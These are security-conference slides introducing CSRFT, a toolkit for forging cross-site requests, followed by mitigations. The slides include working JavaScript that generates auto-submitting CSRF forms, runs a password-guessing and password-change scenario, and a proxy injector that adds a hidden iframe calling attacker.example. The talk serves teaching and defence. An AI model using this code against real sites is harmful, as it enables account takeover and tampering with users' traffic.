CSRFT

A Cross Site Request Forgeries Toolkit


BSides London - 29th April 2014



Paul AMAR


What is this talk about?


  • (Quick) Recap about CSRF attacks
  • Presentation of the tool
  • Demos 
  • Issues in Web architecture
  • Mitigation
  • Little surprise


Slides available here: paulsec.github.io/bsides-london-2014/


    Who am I?


    • (French) Student, M. Sc in Computer Science
    • Passionate about (Web) Security
    • Open source developer


    Twitter: @PaulWebSec

    Github: PaulSec                 


    CSRF Recap


                             Fig. Exploitation of CSRF vulnerability


    Why CSRFT?


    I wanted something:                       

    • Lightweight
    • Cross-platform
    • Open Source
    • Can combine CSRF attacks


    There was no toolkit for this...


    How does it work?


                                                        Fig. Usage of CSRFT


    How is it made?


    • HTTP server developed in Node.js

    • Can forge either GET or POST requests
      • Creates payloads (auto-submitting HTML forms) on-the-fly

    • Client and server side written entirely in JavaScript
      • Communication in JSON


    MORE features


    • Can create scenarios
      • By chaining several CSRF flaws into one attack

    • 2 attack methods possible
      • Special value (craft one specific payload)
        E.g. change the user's password
      • Dictionary attack (replay the same request with each candidate value)
        E.g. try to log the user in with a list of passwords

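    The two mechanisms above (on-the-fly form payloads, and scenarios with a dictionary step), as an added example in Node.js. This is illustrative code written for these notes, not CSRFT's own implementation; the scenario, hostnames and field names are constructed for the example.

```javascript
// Added example (not CSRFT's own code): build auto-submitting CSRF payload pages
// from a JSON-style description, and expand a multi-step scenario (including a
// dictionary step) into the list of concrete payloads an attacker page would load.

// Escape a string for embedding in an HTML attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Build an HTML page containing a hidden form that submits itself on load.
// `request` is { method: 'GET' | 'POST', url, data: { field: value } }.
function buildCsrfPayload(request) {
  const method = (request.method || 'POST').toUpperCase();
  if (method !== 'GET' && method !== 'POST') {
    throw new Error('only GET and POST can be forged with a plain HTML form');
  }
  const inputs = Object.entries(request.data || {})
    .map(([name, value]) =>
      `<input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`)
    .join('\n    ');
  return `<!DOCTYPE html>
<html><body>
  <form id="f" method="${method}" action="${escapeHtml(request.url)}">
    ${inputs}
  </form>
  <script>document.getElementById('f').submit();</script>
</body></html>`;
}

// Expand a scenario into concrete requests. A step is either a fixed request
// or a dictionary step: { method, url, data, dictionary: { field, values } },
// which yields one request per candidate value (e.g. one per password guess).
function expandScenario(scenario) {
  const requests = [];
  for (const step of scenario) {
    if (step.dictionary) {
      const { field, values } = step.dictionary;
      for (const v of values) {
        requests.push({ method: step.method, url: step.url,
                        data: { ...step.data, [field]: v } });
      }
    } else {
      requests.push({ method: step.method, url: step.url, data: step.data || {} });
    }
  }
  return requests;
}

// Constructed scenario mirroring the demo: guess the login, change the
// password, then log the user out. Hostname and field names are assumptions.
const demoScenario = [
  { method: 'POST', url: 'http://target.example/login',
    data: { username: 'admin' },
    dictionary: { field: 'password', values: ['admin', 'password', '123456'] } },
  { method: 'POST', url: 'http://target.example/change_password',
    data: { new_password: 'pwned' } },
  { method: 'GET', url: 'http://target.example/logout' },
];

// Render every request of the scenario into its own payload page.
function renderScenario(scenario) {
  return expandScenario(scenario).map(buildCsrfPayload);
}

if (typeof require !== 'undefined' && require.main === module) {
  renderScenario(demoScenario).forEach((html, i) => {
    console.log(`--- payload ${i + 1} ---\n${html}`);
  });
}
```

    The three-step scenario expands to five payload pages: three login attempts (one per dictionary entry), the password change, and the logout. An attacker page would load them in order, each in a hidden iframe, which is why a login form without a token lets the whole session be driven from another origin.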

    Additional tools


    • JavaScript proxy

    Rewrites the traffic it proxies and injects a malicious iframe into the web pages it returns

    Inspired by Chema Alonso and his talk:

    Owning Bad Guys {And Mafia} With Javascript Botnets @ DEF CON 20

    • Python utility

    Command-line tool that automates the usage of the toolkit
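    The response-rewriting step such a proxy performs, as an added example in Node.js (not CSRFT's own proxy code): inject a hidden iframe pointing at the attacker's payload page into an HTML body, and fix the headers that a rewritten body invalidates. The payload URL and sample response are constructed for the example.

```javascript
// Added example (not CSRFT's own proxy): the response-rewriting step a
// JavaScript proxy performs. Given a proxied response body and headers, it
// injects a hidden iframe that loads the attacker's payload page, then
// corrects the headers so the browser accepts the modified body.
// Hostnames are assumptions.

function injectIframe(body, headers, payloadUrl) {
  const contentType = (headers['content-type'] || '').toLowerCase();
  // Only HTML documents can host an iframe; pass everything else through.
  if (!contentType.includes('text/html')) {
    return { body, headers: { ...headers } };
  }
  const iframe =
    `<iframe src="${payloadUrl}" width="0" height="0" style="display:none"></iframe>`;
  const closeBody = /<\/body>/i;
  // Insert just before </body> when present, otherwise append to the document.
  const newBody = closeBody.test(body)
    ? body.replace(closeBody, (m) => iframe + m)
    : body + iframe;
  const newHeaders = { ...headers };
  // The original Content-Length no longer matches the modified body, and a
  // proxy that rewrote a decompressed body must not claim it is still encoded.
  newHeaders['content-length'] = String(Buffer.byteLength(newBody, 'utf8'));
  delete newHeaders['content-encoding'];
  return { body: newBody, headers: newHeaders };
}

// Constructed sample response, as a proxy would see it after decompression.
const sampleResponse = {
  body: '<html><body><p>hello</p></body></html>',
  headers: {
    'content-type': 'text/html; charset=utf-8',
    'content-length': '38',
    'content-encoding': 'gzip',
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  const out = injectIframe(sampleResponse.body, sampleResponse.headers,
                           'http://attacker.example/payload.html');
  console.log(out.headers);
  console.log(out.body);
}
```

    The header fix-up is the part that is easy to forget: a browser receiving a body longer than the declared Content-Length truncates it, and a stale Content-Encoding makes it try to decompress plain text.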




    Time for some demos?


    DEMO (1/2)


    Custom Scenario

    1. Attempt to log the user in
    2. Send some malicious payloads
    3. Log the user out


    Completely transparent attack


    Demo (2/2)


    Demo using automated tool


    Fig. Automated attack with the Python (command-line) utility: sends a crafted request to change the admin's password


    Bad design in web app (1/2)


    No token in the login form

    The attacker can log the victim into an account they control (or guess the victim's credentials), and the rest of the application can then be targeted


    Bad design in web app (2/2)


    No token on the change-password form

    Vulnerable to a full account takeover if the user's credentials are weak enough to be guessed through the login form


    Mitigation


    • Request token
      • Randomly generated, unpredictable token
      • Tied to the user's session and verified on the server side
      • One of the most widely used mechanisms

    • Re-authentication
      • Asks for the current password before sensitive actions
      • If the password is weak (guessable)? ... Not good!

    • CAPTCHA, session timeout, NoScript with ABE (Application Boundaries Enforcer)


    SURPRISE?


    • Created a (vulnerable) VM
    • Will be hosted on VulnHub
    • You must exploit CSRF flaws to get root access...


    Good luck!




    Questions?


    Code available here: https://github.com/PaulSec/CSRFT/
